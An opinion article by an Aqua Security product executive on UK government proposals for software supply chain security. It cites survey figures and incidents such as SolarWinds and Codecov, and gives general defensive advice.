The UK government recently announced a new proposal to enhance the cybersecurity efforts of the nation’s digital supply chains, writes Ehud Amiri, pictured, VP Product Management, at the cloud security product company Aqua Security.
This change may require IT service vendors to follow to the National Cyber Security Centre’s (NCSC) Cyber Assessment Framework (CAF). This is after the Department for Digital, Culture, Media & Sport (DCMS) published a study on directors, chair members, and CEOs amongst the UK’s largest organisations, revealing that 91 per cent see cyberattacks as an urgent threat to business operations – a large increase from 84 per cent surveyed in 2020. However, just 69 per cent of the organisations surveyed are proactively addressing their cybersecurity concerns in the supply chain.
Additional proposals consist of new rules to ensure that organisations within the public sector acquire technology from agencies with effective cybersecurity measures after evaluation. This suggests that service providers must deliver dependable protections and offer more to their customers as the number of cyberattacks in the UK have reached a new record. Critical services and supply chains, for example Covid-19 vaccine research and distribution, have been targeted on numerous occasions. The most notable occasion was the Solarwinds attack, described by the NCSC as “one of the most serious cyber intrusions of recent times,” due to the widespread impact on critical services.
The majority of modern software projects are made up of ready-made components—either open source, provided by third-party software vendors, written as proprietary custom code, or consumed via external APIs. These ready-made components are being used throughout the organisations’ Software Development Life Cycle (SDLC) to deliver their software products in fast, high-quality, and automated ways.
The advantage of a digital supply chain is that it can accelerate application development. However, it also expands the potential attack surface to include potential attack weaknesses in the SDLC process itself, as well as, within the open-source or third-party software components used through the digital supply chain. If not mitigated correctly, the expanded attack surface, can create critical security gaps in terms of obscuring security risk visibility in upstream artefacts, or by complicating the risk remediation process for outsourced resources. A single compromised off-the-shelf component can make many organisations vulnerable to attack.
There is robust support from industry leaders eager to build new legislation to improve security throughout the supply chain, according to the DCMS’s report. Overtime, security providers must be certain that their applications and software are as impenetrable as possible, especially if they are the first point of contact to accessing sensitive government information or critical public services.
Data from our own research team, Nautilus, has indicated that there is a range in the complexity and evasion capabilities of recent attacks. For instance, they saw the use of malicious container images on Docker Hub where images were meant to hijack organisations’ resources to mine cryptocurrency. Also of note, earlier this year Codecov disclosed an incident report detailing how an attacker was able to get access to a credential via a mistake in how Codecov was building Docker images. This credential then let the attacker modify Codecov’s bash uploader script and use the modified script to steal credentials from the Continuous Integration/Continuous Delivery (CI/CD) environments of customers.
Sophisticated attackers find this new attack vector especially appealing because most organisations are still not focusing their security effort in this direction. Additionally, a successful attack on a popular package can have a massive impact on potentially thousands of organisations.
How to take action
Because supply chain attacks will keep progressing with time, a new set of tools purpose-built for securing the digital supply chain is critical. Organisations need to consider adjusting their security practices with this in mind. There are key actions that organisations can take to better protect themselves from these threats.
With today’s fast pace and velocity of release cycles, developer teams must embed security from the start to ensure the integrity of the software and code. Organisations should include security in every step of their SDLC. This involves evaluating every ready-made component as early as possible, before it being used by the development teams, automating CI/CD security and code tamper detection, and protecting the final artifacts with dynamic threat analysis for containers and vulnerability, malware, and sensitive data scanning software.
